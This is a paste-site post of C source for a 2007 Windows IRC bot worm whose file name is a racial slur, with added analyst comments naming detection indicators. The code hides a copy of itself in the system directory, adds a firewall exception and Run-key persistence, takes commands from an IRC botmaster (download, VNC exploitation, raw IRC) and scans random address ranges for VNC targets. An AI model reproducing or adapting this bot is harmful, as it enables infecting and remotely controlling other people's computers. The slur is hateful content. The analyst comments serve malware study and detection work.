FlyFar

niggerbot.c

Dec 23rd, 2023
C 9.06 KB | Cybersecurity | 0 0
  1. /*
  2.  *      niggerbot.c 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  */
  5.  
  6.  
  7. #include <stdio.h>
  8. #include <winsock.h>
  9. #include <windows.h>
  10.  
  11. #include "niggerbot.h"
  12. #include "ftpd.h"
  13. #include "vncexploit.h"
  14. #include "download.h"
  15. #include "config.h"
  16.  
  17.  
  18.  
  19.  
  20. volatile char *LOL = "GREETZ TO #BOTTALK ON BLUEHELL... YOURE ALL LAMERS THERE! CALL THIS VIRII W32.BOTTALKSUX";
      /* Analyst note: nothing else on this page references LOL. It is a fixed
       * clear-text string literal, so (if it survives compilation) it is a
       * candidate static signature for builds of this source.
       * NOTE(review): `volatile` is presumably there to discourage the compiler
       * from discarding the otherwise unused pointer; confirm against a binary. */
  21.  
  22.  
  23. /* main code
       *
       * WinMain: process entry point. Read top to bottom, the visible code does
       * the following (BOTNAME, REGNAME, MUTEX and THREADS are defined outside
       * this page, presumably in config.h):
       *
       *   1. Install:  if the running image's path does not contain the system
       *                directory path, copy the image to <system dir>\BOTNAME,
       *                mark it hidden/system/read-only, start the copy with a
       *                hidden window and exit.
       *   2. Relaunch: if the command line lacks the literal "Ravo5002",
       *                restart the same image with that string as its command
       *                line (hidden window) and exit.
       *   3. Run:      take a named mutex, add a Windows Firewall
       *                AuthorizedApplications entry and an HKLM Run entry,
       *                initialise Winsock, create one TCP socket and start the
       *                irc, ftpd and rangescan worker threads.
       *
       * Host-side detection points that follow directly from this code: a
       * hidden+system+read-only executable written into the system directory,
       * a process whose command line is exactly "Ravo5002", and writes to the
       * two registry keys named below.
       *
       * Returns 0 on the normal path and when socket() fails; several failure
       * paths leave through ExitProcess()/exit() instead.
       */
  24. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  25.  
  26.     char myfilename[512];
  27.     char sysdir[512];
          /* Resolve the system directory and the full path of the running image. */
  28.     GetSystemDirectory(sysdir, sizeof(sysdir));
  29.     GetModuleFileName(GetModuleHandle(NULL), myfilename, sizeof(myfilename));
  30.  
          /* Install stage: a plain substring test decides whether the image is
           * already running from the system directory. */
  31.     if(strstr(myfilename, sysdir) == NULL) {
  32.         char tmpfilename[512];
              /* Destination path is <system dir>\BOTNAME. */
  33.         sprintf(tmpfilename, "%s\\%s", sysdir, BOTNAME);
              /* FALSE = overwrite an existing file of the same name. */
  34.         CopyFile(myfilename, tmpfilename, FALSE);
              /* Hidden + System + Read-only: the copy is absent from default
               * Explorer listings; this attribute combination on an executable
               * in the system directory is a practical hunting filter. */
  35.         SetFileAttributes(tmpfilename,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
  36.        
  37.         PROCESS_INFORMATION pinfo;
  38.         STARTUPINFO sinfo;
  39.         memset(&pinfo, 0, sizeof(pinfo));
  40.         memset(&sinfo, 0, sizeof(sinfo));
  41.         sinfo.lpTitle     = "";
  42.         sinfo.cb = sizeof(sinfo);
              /* STARTF_USESHOWWINDOW + SW_HIDE: the child gets no visible window. */
  43.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
  44.         sinfo.wShowWindow = SW_HIDE;
  45.  
              /* Start the installed copy detached, with no command line and the
               * system directory as working directory. Only if that succeeds
               * does this (original) process exit; otherwise execution falls
               * through to the relaunch stage below. */
  46.         if (CreateProcess(tmpfilename, NULL, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
  47.             Sleep(200);
  48.             CloseHandle(pinfo.hProcess);
  49.             CloseHandle(pinfo.hThread);
  50.             ExitProcess(EXIT_SUCCESS);
  51.         }
  52.     }
          /* Relaunch stage: any instance whose command line does not contain
           * "Ravo5002" restarts its own image (myfilename) with that literal as
           * the whole command line. Process-creation telemetry showing this
           * command line is an indicator specific to this sample. */
  53.     if(!(strstr(GetCommandLine(), "Ravo5002"))) {
  54.         PROCESS_INFORMATION pinfo;
  55.         STARTUPINFO sinfo;
  56.         memset(&pinfo, 0, sizeof(pinfo));
  57.         memset(&sinfo, 0, sizeof(sinfo));
  58.         sinfo.lpTitle = "";
  59.         sinfo.cb = sizeof(sinfo);
  60.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
  61.         sinfo.wShowWindow = SW_HIDE;
  62.  
  63.         if (CreateProcess(myfilename, "Ravo5002", NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
  64.             Sleep(200);
  65.             CloseHandle(pinfo.hProcess);
  66.             CloseHandle(pinfo.hThread);
  67.             ExitProcess(EXIT_SUCCESS);
  68.         }
  69.     }
  70.    
  71.     // bot was in system dir and started with the Ravo5002 commandline option
          /* Single-instance guard: create/open the named mutex MUTEX and wait up
           * to 3000 ms for it. Only WAIT_TIMEOUT leads to exit; the handle is not
           * stored or released anywhere in the visible code. Once MUTEX's value
           * is recovered from the config, the mutex name is a host indicator. */
  72.     if (WaitForSingleObject(CreateMutex(NULL, FALSE, MUTEX), 3000) == WAIT_TIMEOUT) {
  73.         ExitProcess(EXIT_FAILURE);
  74.     }
  75.  
          /* Windows Firewall exception. A value named after the image path, with
           * data "<image path>:*:Enabled:REGNAME", is written under the
           * StandardProfile AuthorizedApplications\List key in HKLM. None of the
           * registry return codes are checked, so a failed write goes unnoticed
           * and execution continues. Writes to this key by a non-installer
           * process are a detection point.
           * NOTE(review): the commented-out rot13() lines hold the same key path
           * ROT13-encoded; a build using that path would presumably not contain
           * the clear-text key string. */
  76.     char *fwkey ="SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
  77.     //char fwkey[256];
  78.     //rot13(fwkey, "FLFGRZ\\PheeragPbagebyFrg\\Freivprf\\FunerqNpprff\\Cnenzrgref\\SverjnyyCbyvpl\\FgnaqneqCebsvyr\\NhgubevmrqNccyvpngvbaf\\Yvfg");
  79.     // add bot to firewall
  80.     HKEY hkey;
  81.     char pfad[512];
  82.     sprintf(pfad, "%s:*:Enabled:%s", myfilename, REGNAME);
  83.     RegCreateKeyEx(HKEY_LOCAL_MACHINE, fwkey, 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkey, 0);
  84.     RegSetValueEx(hkey, myfilename, 0, REG_SZ, (const unsigned char *)pfad, strlen(pfad));
  85.     RegCloseKey(hkey);
  86.    
          /* Persistence: a value named REGNAME whose data is the image path is
           * written to the HKLM Run key, so the image starts at every logon.
           * Return codes are again unchecked. Autoruns-style baselining of this
           * key is the matching detection point. */
  87.     char *runkey = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  88.     //char runkey[256];
  89.     //rot13(runkey, "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
  90.     // add bot to registry startup
  91.     HKEY key;
  92.     RegCreateKeyEx(HKEY_LOCAL_MACHINE , runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
  93.     RegSetValueEx(key, REGNAME, 0, REG_SZ, (const unsigned char *)myfilename, strlen(myfilename));
  94.     RegCloseKey(key);
  95.  
          /* Request Winsock 1.1; leave via exit(1) if it cannot be initialised. */
  96.     WSADATA wsaData;
  97.     if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
  98.         exit(1);
  99.     }
  100.    
           /* One TCP socket is created here; its value is handed to every worker
            * thread below as the thread argument. */
  101.     SOCKET ircconn;
  102.     ircconn = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  103.    
  104.     if(ircconn == INVALID_SOCKET) {
  105.         return 0;
  106.     }
           /* Worker layout: threads[0] runs irc() (command channel), threads[1]
            * runs ftpd (declared outside this page, presumably ftpd.h), and the
            * remaining THREADS-2 slots each run rangescan(). CreateThread results
            * are not checked. */
  107.     HANDLE threads[THREADS];
  108.     threads[0] = CreateThread(NULL,0, irc, (void *)ircconn, 0, 0);
  109.     threads[1] = CreateThread(NULL,0, ftpd, (void *)ircconn, 0, 0);
  110.     int i;
  111.     for(i = 2; i < THREADS; i++) {
  112.         threads[i] = CreateThread(NULL,0, rangescan, (void *)ircconn, 0, 0);
               /* NOTE(review): lower-case sleep(), unlike the Win32 Sleep() used
                * above; where it comes from and its time unit are not visible on
                * this page. */
  113.         sleep(500);
  114.     }
           /* Waits for all workers. irc() and rangescan() loop forever in the
            * visible code, so this wait is not expected to complete and the
            * cleanup below is effectively unreachable in normal operation. */
  115.     WaitForMultipleObjects( THREADS, threads, TRUE, INFINITE);
  116.     for(i = 0; i < THREADS; i++) {
  117.         CloseHandle(threads[i]);
  118.     }
  119.     WSACleanup();
  120.     return 0;
  121. }
  122.  
  123. char *randnick(void) {
           /* Build a random identifier for IRC registration.
            *
            * Returns a heap-allocated, NUL-terminated string of 4 to 8 upper-case
            * ASCII letters: len = rand()%5 + 4, each character = 65 + rand()%26,
            * i.e. 'A'..'Z'. The caller owns the buffer; no caller on this page
            * frees it. The malloc() result is not checked.
            *
            * Analyst note: every NICK, USER and ident value this file sends is
            * produced here, so registrations carry 4-8 character all-caps names. */
  124.     // shamelessly ripped from kaiten...
           /* The generator is reseeded on every call from the tick count plus the
            * previous rand() output. */
  125.     srand(GetTickCount()+rand());
  126.     char *tmp;
  127.     int len=(rand()%5)+4,i;
  128.     tmp=(char*)malloc(len+1);
           /* Zero-fill so the string is terminated after the loop writes len bytes. */
  129.     memset(tmp,0,len+1);
  130.     for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  131.     return tmp;
  132. }
  133.  
  134. void privmsg_irc(SOCKET ircconn, char *params) {
           /* Dispatch one operator message received over IRC.
            *
            * ircconn: the IRC socket; replies are sent on it.
            * params:  message text after the ':' as split by ircparse(); modified
            *          in place by strtok().
            *
            * The first space-delimited word is the command, the rest of the line
            * (up to a newline) is its argument. Commands are matched with
            * strstr(), i.e. as substrings of the first word, in the order below:
            *   !quit      send "QUIT :Latazz...", close the socket, exit(0)
            *   !irc       send the argument to the server verbatim
            *   !vnc       announce in CHANNEL, then call vncscan() on the argument
            *   !download  announce in CHANNEL, then call download() on the argument
            *   !ip        report getlocalip() to CHANNEL
            *   !version   report VERSION to CHANNEL
            * vncscan() and download() are defined outside this page, as are
            * CHANNEL and VERSION.
            *
            * Analyst note: the fixed reply texts ("QUIT :Latazz...",
            * "Manually exploiting", "Downloading", "My ip is") travel in clear
            * text and are usable as network content signatures. */
  135.  
  136.  
  137.     char *cmd = strtok(params, " ");
  138.     char *options = strtok(NULL, "\n");
           /* Second pass strips a leading/trailing newline from the argument. */
  139.     options = strtok(options, "\n");
  140.    
           /* Scratch buffer for every outgoing line; all writes use sprintf. */
  141.     char buff[4096];
  142.     if(strstr(cmd, "!quit")) {
  143.         sprintf(buff, "QUIT :Latazz...\n");
  144.         send(ircconn,buff, strlen(buff), 0);
  145.         closesocket(ircconn);
               /* exit() ends the whole process, not only this thread. */
  146.         exit(0);
  147.     }
  148.     else if(strstr(cmd, "!irc")) {
               /* Argument is forwarded to the IRC server unchanged. */
  149.         sprintf(buff, "%s\n", options);
  150.         send(ircconn,buff, strlen(buff), 0);
  151.         return;
  152.     }
  153.     else if(strstr(cmd, "!vnc")) {
  154.         sprintf(buff, "PRIVMSG %s :Manually exploiting %s...\n", CHANNEL, options);
  155.         send(ircconn,buff, strlen(buff), 0);
  156.         vncscan(ircconn, options);
  157.         return;
  158.     }
  159.     else if(strstr(cmd, "!download")) {
  160.         sprintf(buff, "PRIVMSG %s :Downloading %s...\n", CHANNEL, options);
  161.         send(ircconn,buff, strlen(buff), 0);
  162.         download(ircconn, options);
  163.         return;
  164.     }
  165.     else if(strstr(cmd, "!ip")) {
  166.         sprintf(buff, "PRIVMSG %s :My ip is %s...\n", CHANNEL, getlocalip());
  167.         send(ircconn,buff, strlen(buff), 0);
  168.         return;
  169.     }
  170.     else if(strstr(cmd, "!version")) {
  171.         sprintf(buff, "PRIVMSG %s :%s\n", CHANNEL, VERSION);
  172.         send(ircconn,buff, strlen(buff), 0);
  173.         return;
  174.     }
           /* Unrecognised commands are ignored silently. */
  175.     return;
  176. }
  177.  
  178. unsigned long irc(void *s) {
           /* Command-channel thread: connect to the IRC server and process lines
            * forever.
            *
            * s: the SOCKET created in WinMain, passed through the thread argument.
            * Returns 0, but the receive loop below has no exit in the visible
            * code.
            *
            * SERVER, PORT and CHANNEL are defined outside this page.
            *
            * Analyst note: the observable network sequence is a DNS lookup of
            * SERVER, an outbound TCP connection to PORT retried until it
            * succeeds, then clear-text IRC registration. The USER line has the
            * fixed shape  USER <rand> "<rand>" "localhost" :<nick>  with all
            * random parts being 4-8 upper-case letters from randnick(). */
  179.  
  180.     struct hostent *hp;
  181.     unsigned int addr;
  182.     struct sockaddr_in server;
  183.     SOCKET ircconn = (SOCKET)s;
  184.     char buff[4096];
  185.  
           /* The lookup result is dereferenced on the next statement without a
            * NULL check. */
  186.     hp = gethostbyname(SERVER);
  187.  
  188.     server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
  189.     server.sin_family=AF_INET;
  190.     server.sin_port=htons(PORT);
           /* connect() returns non-zero on failure, so this loop retries until
            * the connection is established. */
  191.     while(connect(ircconn,(struct sockaddr*)&server,sizeof(server))) {
  192.         //printf("cant connect to ircd, lets wait...\n");
  193.         sleep(2000);
  194.     }
  195.  
  196.     char *nick = randnick();
  197.     char *user = randnick();
  198.     char *ident = randnick();
  199.  
           /* IRC registration followed by joining the control channel. */
  200.     sprintf(buff, "NICK %s\n", nick);
  201.     send(ircconn,buff,strlen(buff),0);
  202.     sprintf(buff, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
  203.     send(ircconn,buff,strlen(buff),0); 
  204.     sprintf(buff, "JOIN %s\n", CHANNEL);
  205.     send(ircconn,buff,strlen(buff),0);
  206.    
           /* Receive loop: the buffer is cleared, filled by one recv() and handed
            * to ircparse(). recv()'s return value is ignored, so a closed or
            * failed connection is not detected here. */
  207.     while(1) {
  208.         memset(buff,0,sizeof(buff));
  209.         recv(ircconn,buff,sizeof(buff),0);
  210.         ircparse(ircconn, buff);
  211.         //printf("%s\n", buff); // debug
  212.         //Sleep(2000);
  213.     }
  214.     return 0;
  215.  
  216. }
  217.  
  218.  
  219. void ircparse(SOCKET ircconn, char ircline[4096]) {
           /* Parse one buffer received from the IRC server and react to it.
            *
            * ircconn: the IRC socket.
            * ircline: receive buffer; tokenised in place with strtok() and also
            *          reused as the output buffer for replies.
            *
            * Handling, in order:
            *   - first token contains "PING"    -> reply "PONG <rest>"
            *   - first token contains BOTMASTER -> PRIVMSG/NOTICE text is passed
            *                                       to privmsg_irc(); anything
            *                                       else from that sender is
            *                                       dropped
            *   - command contains "433"         -> new random NICK, then JOIN
            *   - command contains "451"         -> full NICK/USER/JOIN again
            * BOTMASTER and CHANNEL are defined outside this page.
            *
            * Analyst note: the only sender check in the visible code is the
            * strstr() test of BOTMASTER against the first token of the line. */
  220.    
           /* "\0" as a delimiter string is the empty set, so the second strtok()
            * returns the whole remainder of the line. */
  221.     char *first = strtok(ircline, " ");
  222.     char *last = strtok(NULL, "\0");
  223.     if (!first || !last)
  224.         return;
  225.    
  226.    
  227.     // normal irc functions here
  228.     if(strstr(first, "PING")) {
  229.         sprintf(ircline, "PONG %s\n", last);
  230.         send(ircconn,ircline,strlen(ircline),0);
  231.         return;
  232.     }
  233.    
  234.     // botmaster functions here
           /* Split the remainder into the command word, skip ahead to the ':'
            * and keep everything after it as the message text. */
  235.     char *command = strtok(last, " ");
  236.     strtok(NULL, ":");
  237.     char *parameters = strtok(NULL, "\0");
  238.    
  239.     if(strstr(first, BOTMASTER)) {
  240.         if(strstr(command, "PRIVMSG") || strstr(command, "NOTICE")) {
  241.             privmsg_irc(ircconn, parameters);
  242.             return;
  243.         }
  244.         return;
  245.     }
  246.    
  247.     // error irc functions here
           /* The two numerics are matched as substrings of the command word. */
  248.     else if(strstr(command, "433")) {
  249.         sprintf(ircline, "NICK %s\n", randnick());
  250.         send(ircconn,ircline,strlen(ircline),0);
  251.         sprintf(ircline, "JOIN %s\n", CHANNEL);
  252.         send(ircconn,ircline,strlen(ircline),0);
  253.         return;
  254.     }
  255.     else if(strstr(command, "451")) {
  256.         char *nick = randnick();
  257.         char *user = randnick();
  258.         char *ident = randnick();
  259.         sprintf(ircline, "NICK %s\n",  nick);
  260.         send(ircconn,ircline,strlen(ircline),0);
  261.         sprintf(ircline, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
  262.         send(ircconn,ircline,strlen(ircline),0);   
  263.         sprintf(ircline, "JOIN %s\n", CHANNEL);
  264.         send(ircconn,ircline,strlen(ircline),0);
  265.     }
  266.    
  267.     return;
  268. }
  269.  
  270. unsigned long rangescan(void *s) {
           /* Scanner thread: pick a /16 prefix and call vncscan() on random
            * addresses inside it, forever.
            *
            * s: the SOCKET created in WinMain, passed through the thread argument
            *    and forwarded to vncscan() (defined outside this page, so what it
            *    does with each address is not visible here).
            * Returns 0, but the loop below has no exit in the visible code.
            *
            * The prefix is the first two octets of the host's own address unless
            * that address matches the filter below, in which case one of four
            * hard-coded prefixes is chosen at random.
            *
            * Analyst note: the resulting traffic pattern is a steady stream of
            * connection attempts to random hosts that all share one /16, issued
            * by THREADS-2 threads in parallel. */
  271.  
  272.     SOCKET ircconn = (SOCKET)s;
  273.    
  274.     // get first two octets of local ip adress.
  275.     char myhostname[80];
  276.     int a, b, c, d;
  277.     gethostname(myhostname, sizeof(myhostname));
           /* The lookup result is used without a NULL check. */
  278.     struct hostent *phe = gethostbyname(myhostname);
  279.     struct in_addr addr;
  280.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
  281.     char *localip = inet_ntoa(addr);
  282.  
           /* strtok() splits the dotted-quad text in place; only the first two
            * octets are kept. */
  283.     a = atoi(strtok(localip, "."));
  284.     b = atoi(strtok(NULL, "."));
  285.    
  286.  
  287.    
           /* Filter for local prefixes that are replaced. As written, the
            * comparisons are strict: the 172 test matches second octets 17..30
            * and the "40.-50." test matches first octets 41..49, which is narrower
            * than the inline comments state. */
  288.     if(
  289.         (a == 192 && b == 168) ||               // 192.168
  290.         a == 10 ||                              // 10.
  291.         (a == 172 && (b > 16 && b < 31)) ||     //172.16-172.31
  292.         (a > 40 && a < 50) ||                   // 40.-50. (gov ranges and network 44)
  293.         (a == 169) ||                           // 169. (error adress)
  294.         a < 4                                   // gov adresses
  295.        ) {
               /* rand()%4 selects one of the four (first, second) octet pairs.
                * This draw happens before the srand() call below. */
  296.         int rangesize = rand()%4;               // 4 is the amount of ranges :)
  297.         char *ranges[] = {                      // ranges to scan when internal... these ranges wont be exploited, but only shown in channel
  298.             "220", "116",
  299.             "200", "161",
  300.             "200", "162",
  301.             "200", "0"
  302.         };
  303.         a = atoi(ranges[rangesize*2]);
  304.         b = atoi(ranges[rangesize*2+1]);
  305.     }
  306.     srand(GetTickCount());
  307.     char ip[32];
           /* Third and fourth octets are each drawn from 1..253. */
  308.     while(1) {
  309.         c = rand()%253+1;
  310.         d = rand()%253+1;
  311.         sprintf(ip, "%d.%d.%d.%d", a, b, c, d);
  312.         vncscan(ircconn, ip);
  313.     }
  314.     return 0;
  315. }
  316.  
  317.  
  318. char *getlocalip(void) {
           /* Return the host's first resolved address as dotted-quad text.
            *
            * Looks up the local hostname and formats h_addr_list[0] with
            * inet_ntoa(). The returned pointer is whatever inet_ntoa() hands
            * back (a buffer owned by the socket library, not by the caller), so
            * it must not be freed and is overwritten by later inet_ntoa() calls.
            * Neither gethostname() nor gethostbyname() is checked for failure.
            * Used by the "!ip" command in privmsg_irc(). */
  319.     char myhostname[80];
  320.     gethostname(myhostname, sizeof(myhostname));
  321.     struct hostent *phe = gethostbyname(myhostname);
  322.     struct in_addr addr;
  323.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
  324.     return inet_ntoa(addr);
  325. }